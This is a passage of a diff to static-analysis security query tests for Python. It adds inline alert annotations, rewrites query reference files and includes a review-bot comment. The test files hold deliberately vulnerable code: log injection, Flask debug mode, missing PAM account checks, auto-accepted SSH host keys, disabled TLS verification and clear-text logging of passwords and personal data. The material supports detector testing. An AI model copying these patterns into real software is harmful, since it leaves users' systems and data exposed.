@@ -44,8 +49,3 @@ nodes | LogInjectionBad.py:35:12:35:35 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | subpaths -#select -| LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.qlref b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.qlref index 1837c628c33e..fc8a61c453d2 100644 --- a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.qlref 
@@ -1 +1,2 @@ -Security/CWE-117/LogInjection.ql +query: Security/CWE-117/LogInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjectionBad.py b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjectionBad.py index 0c0cbe1a8fee..a2b5dc7eec06 100644 --- a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjectionBad.py +++ b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjectionBad.py @@ -4,7 +4,7 @@ @Desc :Log Injection """ from flask import Flask -from flask import request +from flask import request # $ Source from django.utils.log import request_logger import logging @@ -15,26 +15,26 @@ @app.route('/bad1') def bad1(): name = request.args.get('name') - app.logger.info('User name: ' + name) # Bad + app.logger.info('User name: ' + name) # Bad # $ Alert return 'bad1' @app.route('/bad2') def bad2(): name = request.args.get('name') - logging.info('User name: ' + name) # Bad + logging.info('User name: ' + name) # Bad # $ Alert return 'bad2' @app.route('/bad3') def bad3(): name = request.args.get('name') - request_logger.warn('User name: ' + name) # Bad + request_logger.warn('User name: ' + name) # Bad # $ Alert return 'bad3' @app.route('/bad4') def bad4(): name = request.args.get('name') logtest = logging.getLogger('test') - logtest.debug('User name: ' + name) # Bad + logtest.debug('User name: ' + name) # Bad # $ Alert return 'bad4' if __name__ == '__main__': diff --git a/python/ql/test/query-tests/Security/CWE-209-StackTraceExposure/StackTraceExposure.qlref b/python/ql/test/query-tests/Security/CWE-209-StackTraceExposure/StackTraceExposure.qlref index 18cf2d49a1aa..1dd7d31abad3 100644 --- a/python/ql/test/query-tests/Security/CWE-209-StackTraceExposure/StackTraceExposure.qlref +++ b/python/ql/test/query-tests/Security/CWE-209-StackTraceExposure/StackTraceExposure.qlref 
@@ -1 +1 @@ -Security/CWE-209/StackTraceExposure.ql +query: Security/CWE-209/StackTraceExposure.ql diff --git a/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/FlaskDebug.qlref b/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/FlaskDebug.qlref index 0e21a3ac14fe..0fad5641329e 100644 --- a/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/FlaskDebug.qlref +++ b/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/FlaskDebug.qlref @@ -1 +1,2 @@ -Security/CWE-215/FlaskDebug.ql +query: Security/CWE-215/FlaskDebug.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/test.py b/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/test.py index c1d653aab937..65435cde31ae 100644 --- a/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/test.py +++ b/python/ql/test/query-tests/Security/CWE-215-FlaskDebug/test.py @@ -7,8 +7,8 @@ def main(): raise Exception() # bad -app.run(debug=True) -app.run('host', 8080, True) +app.run(debug=True) # $ Alert +app.run('host', 8080, True) # $ Alert # okay app.run() @@ -23,11 +23,11 @@ def main(): DEBUG = True -app.run(debug=DEBUG) # NOT OK +app.run(debug=DEBUG) # NOT OK # $ Alert DEBUG = 1 -app.run(debug=DEBUG) # NOT OK +app.run(debug=DEBUG) # NOT OK # $ Alert if False: app.run(debug=True) @@ -35,12 +35,12 @@ def main(): runapp = app.run -runapp(debug=True) # NOT OK +runapp(debug=True) # NOT OK # $ Alert # imports from other module import settings -app.run(debug=settings.ALWAYS_TRUE) # NOT OK +app.run(debug=settings.ALWAYS_TRUE) # NOT OK # $ Alert # depending on environment values diff --git a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected index 8031d3070c94..99114d85cfbd 100644 --- a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected 
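Review bot: StackTraceExposure.qlref is converted to the `query:` form but gets no `postprocess: utils/test/InlineExpectationsTestQuery.ql` line, unlike every other .qlref changed in this part of the patch. If that is deliberate because the CWE-209 test sources carry no `# $ Alert` annotations yet, a sentence in the commit description would make it clear. Otherwise add the `postprocess:` line together with the annotations, so the stack-trace exposure test is checked inline like its neighbours.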
+++ b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.expected @@ -1,3 +1,5 @@ +#select +| pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | This PAM authentication depends on a $@, and 'pam_acct_mgmt' is not called afterwards. | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | user-provided value | edges | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:4:26:4:32 | ControlFlowNode for request | provenance | | | pam_test.py:4:26:4:32 | ControlFlowNode for request | pam_test.py:71:16:71:22 | ControlFlowNode for request | provenance | | @@ -20,5 +22,3 @@ nodes | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | semmle.label | ControlFlowNode for pam_authenticate() | | pam_test.py:76:31:76:36 | ControlFlowNode for handle | semmle.label | ControlFlowNode for handle | subpaths -#select -| pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | pam_test.py:76:14:76:40 | ControlFlowNode for pam_authenticate() | This PAM authentication depends on a $@, and 'pam_acct_mgmt' is not called afterwards. | pam_test.py:4:26:4:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.qlref b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.qlref index 81915461d7ad..de31c362b6ca 100644 --- a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.qlref +++ b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/PamAuthorization.qlref @@ -1 +1,2 @@ -Security/CWE-285/PamAuthorization.ql +query: Security/CWE-285/PamAuthorization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/pam_test.py b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/pam_test.py index f16e3c9941ea..364b2a64f7da 100644 --- a/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/pam_test.py +++ b/python/ql/test/query-tests/Security/CWE-285-PamAuthorization/pam_test.py @@ -1,7 +1,7 @@ from ctypes import CDLL, POINTER, Structure, byref from ctypes import c_char_p, c_int from ctypes.util import find_library -from flask import Flask, request, redirect +from flask import Flask, request, redirect # $ Source class PamHandle(Structure): @@ -73,7 +73,7 @@ def bad(): conv = PamConv(None, 0) retval = pam_start(service, username, byref(conv), byref(handle)) - retval = pam_authenticate(handle, 0) + retval = pam_authenticate(handle, 0) # $ Alert # NOT OK: no call to `pam_acct_mgmt` auth_success = retval == 0 diff --git a/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/MissingHostKeyValidation.qlref b/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/MissingHostKeyValidation.qlref index c366095516af..5b75b5eea103 100644 --- a/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/MissingHostKeyValidation.qlref +++ b/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/MissingHostKeyValidation.qlref @@ -1 +1,2 @@ -Security/CWE-295/MissingHostKeyValidation.ql +query: Security/CWE-295/MissingHostKeyValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/paramiko_host_key.py b/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/paramiko_host_key.py index 3d0a59dcd8f9..6513b81fbcbb 100644 --- a/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/paramiko_host_key.py +++ b/python/ql/test/query-tests/Security/CWE-295-MissingHostKeyValidation/paramiko_host_key.py 
@@ -2,19 +2,19 @@ client = SSHClient() -client.set_missing_host_key_policy(AutoAddPolicy) # bad +client.set_missing_host_key_policy(AutoAddPolicy) # bad # $ Alert client.set_missing_host_key_policy(RejectPolicy) # good -client.set_missing_host_key_policy(WarningPolicy) # bad +client.set_missing_host_key_policy(WarningPolicy) # bad # $ Alert # Using instances -client.set_missing_host_key_policy(AutoAddPolicy()) # bad +client.set_missing_host_key_policy(AutoAddPolicy()) # bad # $ Alert client.set_missing_host_key_policy(RejectPolicy()) # good -client.set_missing_host_key_policy(WarningPolicy()) # bad +client.set_missing_host_key_policy(WarningPolicy()) # bad # $ Alert # different import import paramiko client = paramiko.SSHClient() -client.set_missing_host_key_policy(paramiko.AutoAddPolicy) # bad +client.set_missing_host_key_policy(paramiko.AutoAddPolicy) # bad # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/RequestWithoutValidation.qlref b/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/RequestWithoutValidation.qlref index 7ad4d4d2ae34..cda6ce83c836 100644 --- a/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/RequestWithoutValidation.qlref +++ b/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/RequestWithoutValidation.qlref @@ -1 +1,2 @@ -Security/CWE-295/RequestWithoutValidation.ql +query: Security/CWE-295/RequestWithoutValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/make_request.py b/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/make_request.py index 29e857e07b1c..e907fd281f5a 100644 --- a/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/make_request.py +++ b/python/ql/test/query-tests/Security/CWE-295-RequestWithoutValidation/make_request.py 
@@ -2,14 +2,14 @@ #Simple cases requests.get('https://semmle.com', verify=True) # GOOD -requests.get('https://semmle.com', verify=False) # BAD +requests.get('https://semmle.com', verify=False) # BAD # $ Alert requests.post('https://semmle.com', verify=True) # GOOD -requests.post('https://semmle.com', verify=False) # BAD +requests.post('https://semmle.com', verify=False) # BAD # $ Alert # Simple flow put = requests.put put('https://semmle.com', verify="/path/to/cert/") # GOOD -put('https://semmle.com', verify=False) # BAD +put('https://semmle.com', verify=False) # BAD # $ Alert #Other flow delete = requests.delete @@ -25,17 +25,17 @@ def req1(verify=False): patch = requests.patch def req2(verify): - patch('https://semmle.com', verify=verify) # BAD (from line 30) + patch('https://semmle.com', verify=verify) # BAD (from line 30) # $ Alert req2(False) # BAD (at line 28) req2("/path/to/cert/") # GOOD #Falsey value -requests.post('https://semmle.com', verify=0) # BAD +requests.post('https://semmle.com', verify=0) # BAD # $ Alert # requests treat `None` as default value, which means it is turned on requests.get('https://semmle.com') # OK requests.get('https://semmle.com', verify=None) # OK s = requests.Session() -s.get("url", verify=False) # BAD +s.get("url", verify=False) # BAD # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected index 5da1b60eee12..47f27dbc5f27 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.expected 
@@ -1,3 +1,28 @@ +#select +| test.py:20:48:20:55 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:20:48:20:55 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:22:58:22:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:22:58:22:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:23:58:23:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:23:58:23:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:27:40:27:47 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:27:40:27:47 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:30:58:30:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:30:58:30:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | This expression logs $@ as clear text. 
| test.py:37:11:37:24 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:39:22:39:35 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:40:22:40:35 | ControlFlowNode for get_password() | sensitive data (password) | +| test.py:45:11:45:11 | ControlFlowNode for x | test.py:44:9:44:25 | ControlFlowNode for Attribute() | test.py:45:11:45:11 | ControlFlowNode for x | This expression logs $@ as clear text. | test.py:44:9:44:25 | ControlFlowNode for Attribute() | sensitive data (password) | +| test.py:49:15:49:36 | ControlFlowNode for social_security_number | test.py:48:14:48:35 | ControlFlowNode for social_security_number | test.py:49:15:49:36 | ControlFlowNode for social_security_number | This expression logs $@ as clear text. | test.py:48:14:48:35 | ControlFlowNode for social_security_number | sensitive data (private) | +| test.py:50:15:50:17 | ControlFlowNode for ssn | test.py:48:38:48:40 | ControlFlowNode for ssn | test.py:50:15:50:17 | ControlFlowNode for ssn | This expression logs $@ as clear text. | test.py:48:38:48:40 | ControlFlowNode for ssn | sensitive data (private) | +| test.py:52:15:52:24 | ControlFlowNode for passportNo | test.py:48:54:48:63 | ControlFlowNode for passportNo | test.py:52:15:52:24 | ControlFlowNode for passportNo | This expression logs $@ as clear text. 
| test.py:48:54:48:63 | ControlFlowNode for passportNo | sensitive data (private) | +| test.py:55:15:55:23 | ControlFlowNode for post_code | test.py:54:14:54:22 | ControlFlowNode for post_code | test.py:55:15:55:23 | ControlFlowNode for post_code | This expression logs $@ as clear text. | test.py:54:14:54:22 | ControlFlowNode for post_code | sensitive data (private) | +| test.py:56:15:56:21 | ControlFlowNode for zipCode | test.py:54:25:54:31 | ControlFlowNode for zipCode | test.py:56:15:56:21 | ControlFlowNode for zipCode | This expression logs $@ as clear text. | test.py:54:25:54:31 | ControlFlowNode for zipCode | sensitive data (private) | +| test.py:57:15:57:26 | ControlFlowNode for home_address | test.py:54:34:54:45 | ControlFlowNode for home_address | test.py:57:15:57:26 | ControlFlowNode for home_address | This expression logs $@ as clear text. | test.py:54:34:54:45 | ControlFlowNode for home_address | sensitive data (private) | +| test.py:60:15:60:27 | ControlFlowNode for user_latitude | test.py:59:14:59:26 | ControlFlowNode for user_latitude | test.py:60:15:60:27 | ControlFlowNode for user_latitude | This expression logs $@ as clear text. | test.py:59:14:59:26 | ControlFlowNode for user_latitude | sensitive data (private) | +| test.py:61:15:61:28 | ControlFlowNode for user_longitude | test.py:59:29:59:42 | ControlFlowNode for user_longitude | test.py:61:15:61:28 | ControlFlowNode for user_longitude | This expression logs $@ as clear text. | test.py:59:29:59:42 | ControlFlowNode for user_longitude | sensitive data (private) | +| test.py:64:15:64:27 | ControlFlowNode for mobile_number | test.py:63:14:63:26 | ControlFlowNode for mobile_number | test.py:64:15:64:27 | ControlFlowNode for mobile_number | This expression logs $@ as clear text. 
| test.py:63:14:63:26 | ControlFlowNode for mobile_number | sensitive data (private) | +| test.py:65:15:65:21 | ControlFlowNode for phoneNo | test.py:63:29:63:35 | ControlFlowNode for phoneNo | test.py:65:15:65:21 | ControlFlowNode for phoneNo | This expression logs $@ as clear text. | test.py:63:29:63:35 | ControlFlowNode for phoneNo | sensitive data (private) | +| test.py:68:15:68:24 | ControlFlowNode for creditcard | test.py:67:14:67:23 | ControlFlowNode for creditcard | test.py:68:15:68:24 | ControlFlowNode for creditcard | This expression logs $@ as clear text. | test.py:67:14:67:23 | ControlFlowNode for creditcard | sensitive data (private) | +| test.py:69:15:69:24 | ControlFlowNode for debit_card | test.py:67:26:67:35 | ControlFlowNode for debit_card | test.py:69:15:69:24 | ControlFlowNode for debit_card | This expression logs $@ as clear text. | test.py:67:26:67:35 | ControlFlowNode for debit_card | sensitive data (private) | +| test.py:70:15:70:25 | ControlFlowNode for bank_number | test.py:67:38:67:48 | ControlFlowNode for bank_number | test.py:70:15:70:25 | ControlFlowNode for bank_number | This expression logs $@ as clear text. | test.py:67:38:67:48 | ControlFlowNode for bank_number | sensitive data (private) | +| test.py:73:15:73:17 | ControlFlowNode for ccn | test.py:67:76:67:78 | ControlFlowNode for ccn | test.py:73:15:73:17 | ControlFlowNode for ccn | This expression logs $@ as clear text. | test.py:67:76:67:78 | ControlFlowNode for ccn | sensitive data (private) | +| test.py:74:15:74:22 | ControlFlowNode for user_ccn | test.py:67:81:67:88 | ControlFlowNode for user_ccn | test.py:74:15:74:22 | ControlFlowNode for user_ccn | This expression logs $@ as clear text. 
| test.py:67:81:67:88 | ControlFlowNode for user_ccn | sensitive data (private) | edges | test.py:19:5:19:12 | ControlFlowNode for password | test.py:20:48:20:55 | ControlFlowNode for password | provenance | | | test.py:19:5:19:12 | ControlFlowNode for password | test.py:22:58:22:65 | ControlFlowNode for password | provenance | | 
@@ -67,28 +92,3 @@ nodes | test.py:73:15:73:17 | ControlFlowNode for ccn | semmle.label | ControlFlowNode for ccn | | test.py:74:15:74:22 | ControlFlowNode for user_ccn | semmle.label | ControlFlowNode for user_ccn | subpaths -#select -| test.py:20:48:20:55 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:20:48:20:55 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:22:58:22:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:22:58:22:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:23:58:23:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:23:58:23:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:27:40:27:47 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:27:40:27:47 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:30:58:30:65 | ControlFlowNode for password | test.py:19:16:19:29 | ControlFlowNode for get_password() | test.py:30:58:30:65 | ControlFlowNode for password | This expression logs $@ as clear text. | test.py:19:16:19:29 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | test.py:37:11:37:24 | ControlFlowNode for get_password() | This expression logs $@ as clear text. 
| test.py:37:11:37:24 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | test.py:39:22:39:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:39:22:39:35 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | test.py:40:22:40:35 | ControlFlowNode for get_password() | This expression logs $@ as clear text. | test.py:40:22:40:35 | ControlFlowNode for get_password() | sensitive data (password) | -| test.py:45:11:45:11 | ControlFlowNode for x | test.py:44:9:44:25 | ControlFlowNode for Attribute() | test.py:45:11:45:11 | ControlFlowNode for x | This expression logs $@ as clear text. | test.py:44:9:44:25 | ControlFlowNode for Attribute() | sensitive data (password) | -| test.py:49:15:49:36 | ControlFlowNode for social_security_number | test.py:48:14:48:35 | ControlFlowNode for social_security_number | test.py:49:15:49:36 | ControlFlowNode for social_security_number | This expression logs $@ as clear text. | test.py:48:14:48:35 | ControlFlowNode for social_security_number | sensitive data (private) | -| test.py:50:15:50:17 | ControlFlowNode for ssn | test.py:48:38:48:40 | ControlFlowNode for ssn | test.py:50:15:50:17 | ControlFlowNode for ssn | This expression logs $@ as clear text. | test.py:48:38:48:40 | ControlFlowNode for ssn | sensitive data (private) | -| test.py:52:15:52:24 | ControlFlowNode for passportNo | test.py:48:54:48:63 | ControlFlowNode for passportNo | test.py:52:15:52:24 | ControlFlowNode for passportNo | This expression logs $@ as clear text. 
| test.py:48:54:48:63 | ControlFlowNode for passportNo | sensitive data (private) | -| test.py:55:15:55:23 | ControlFlowNode for post_code | test.py:54:14:54:22 | ControlFlowNode for post_code | test.py:55:15:55:23 | ControlFlowNode for post_code | This expression logs $@ as clear text. | test.py:54:14:54:22 | ControlFlowNode for post_code | sensitive data (private) | -| test.py:56:15:56:21 | ControlFlowNode for zipCode | test.py:54:25:54:31 | ControlFlowNode for zipCode | test.py:56:15:56:21 | ControlFlowNode for zipCode | This expression logs $@ as clear text. | test.py:54:25:54:31 | ControlFlowNode for zipCode | sensitive data (private) | -| test.py:57:15:57:26 | ControlFlowNode for home_address | test.py:54:34:54:45 | ControlFlowNode for home_address | test.py:57:15:57:26 | ControlFlowNode for home_address | This expression logs $@ as clear text. | test.py:54:34:54:45 | ControlFlowNode for home_address | sensitive data (private) | -| test.py:60:15:60:27 | ControlFlowNode for user_latitude | test.py:59:14:59:26 | ControlFlowNode for user_latitude | test.py:60:15:60:27 | ControlFlowNode for user_latitude | This expression logs $@ as clear text. | test.py:59:14:59:26 | ControlFlowNode for user_latitude | sensitive data (private) | -| test.py:61:15:61:28 | ControlFlowNode for user_longitude | test.py:59:29:59:42 | ControlFlowNode for user_longitude | test.py:61:15:61:28 | ControlFlowNode for user_longitude | This expression logs $@ as clear text. | test.py:59:29:59:42 | ControlFlowNode for user_longitude | sensitive data (private) | -| test.py:64:15:64:27 | ControlFlowNode for mobile_number | test.py:63:14:63:26 | ControlFlowNode for mobile_number | test.py:64:15:64:27 | ControlFlowNode for mobile_number | This expression logs $@ as clear text. 
| test.py:63:14:63:26 | ControlFlowNode for mobile_number | sensitive data (private) | -| test.py:65:15:65:21 | ControlFlowNode for phoneNo | test.py:63:29:63:35 | ControlFlowNode for phoneNo | test.py:65:15:65:21 | ControlFlowNode for phoneNo | This expression logs $@ as clear text. | test.py:63:29:63:35 | ControlFlowNode for phoneNo | sensitive data (private) | -| test.py:68:15:68:24 | ControlFlowNode for creditcard | test.py:67:14:67:23 | ControlFlowNode for creditcard | test.py:68:15:68:24 | ControlFlowNode for creditcard | This expression logs $@ as clear text. | test.py:67:14:67:23 | ControlFlowNode for creditcard | sensitive data (private) | -| test.py:69:15:69:24 | ControlFlowNode for debit_card | test.py:67:26:67:35 | ControlFlowNode for debit_card | test.py:69:15:69:24 | ControlFlowNode for debit_card | This expression logs $@ as clear text. | test.py:67:26:67:35 | ControlFlowNode for debit_card | sensitive data (private) | -| test.py:70:15:70:25 | ControlFlowNode for bank_number | test.py:67:38:67:48 | ControlFlowNode for bank_number | test.py:70:15:70:25 | ControlFlowNode for bank_number | This expression logs $@ as clear text. | test.py:67:38:67:48 | ControlFlowNode for bank_number | sensitive data (private) | -| test.py:73:15:73:17 | ControlFlowNode for ccn | test.py:67:76:67:78 | ControlFlowNode for ccn | test.py:73:15:73:17 | ControlFlowNode for ccn | This expression logs $@ as clear text. | test.py:67:76:67:78 | ControlFlowNode for ccn | sensitive data (private) | -| test.py:74:15:74:22 | ControlFlowNode for user_ccn | test.py:67:81:67:88 | ControlFlowNode for user_ccn | test.py:74:15:74:22 | ControlFlowNode for user_ccn | This expression logs $@ as clear text. | test.py:67:81:67:88 | ControlFlowNode for user_ccn | sensitive data (private) | 
diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.qlref b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.qlref index de9273391c84..2309f8c643a1 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.qlref +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/CleartextLogging.qlref @@ -1 +1,2 @@ -Security/CWE-312/CleartextLogging.ql \ No newline at end of file +query: Security/CWE-312/CleartextLogging.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/test.py b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/test.py index ff01680ed81c..65812b9ebd6c 100644 --- a/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/test.py +++ b/python/ql/test/query-tests/Security/CWE-312-CleartextLogging/test.py 
@@ -16,62 +16,62 @@ def get_cert(): def log_password(): - password = get_password() - logging.info("logging.info Password '%s'", password) # NOT OK + password = get_password() # $ Source + logging.info("logging.info Password '%s'", password) # NOT OK # $ Alert - LOGGER.log(logging.INFO, "LOGGER.log Password '%s'", password) # NOT OK - logging.root.info("logging.root.info Password '%s'", password) # NOT OK + LOGGER.log(logging.INFO, "LOGGER.log Password '%s'", password) # NOT OK # $ Alert + logging.root.info("logging.root.info Password '%s'", password) # NOT OK # $ Alert # name of logger variable should not matter foo = LOGGER - foo.info("foo.info Password '%s'", password) # NOT OK + foo.info("foo.info Password '%s'", password) # NOT OK # $ Alert # return value from function - get_logger().info("get_logger().info Password '%s'", password) # NOT OK + get_logger().info("get_logger().info Password '%s'", password) # NOT OK # $ Alert def log_cert(): logging.debug("Cert=%s", get_cert()) # OK def print_password(): - print(get_password()) # NOT OK + print(get_password()) # NOT OK # $ Alert - sys.stdout.write(get_password()) # NOT OK - sys.stderr.write(get_password()) # NOT OK + sys.stdout.write(get_password()) # NOT OK # $ Alert + sys.stderr.write(get_password()) # NOT OK # $ Alert import getpass - x = getpass.getpass() - print(x) # NOT OK + x = getpass.getpass() # $ Source + print(x) # NOT OK # $ Alert def log_private(): - def log1(social_security_number, ssn, className, passportNo): - print(social_security_number) # NOT OK - print(ssn) # NOT OK + def log1(social_security_number, ssn, className, passportNo): # $ Source + print(social_security_number) # NOT OK # $ Alert + print(ssn) # NOT OK # $ Alert print(className) # OK - print(passportNo) # NOT OK + print(passportNo) # NOT OK # $ Alert - def log2(post_code, zipCode, home_address): - print(post_code) # NOT OK - print(zipCode) # NOT OK - print(home_address) # NOT OK + def log2(post_code, zipCode, home_address): # $ 
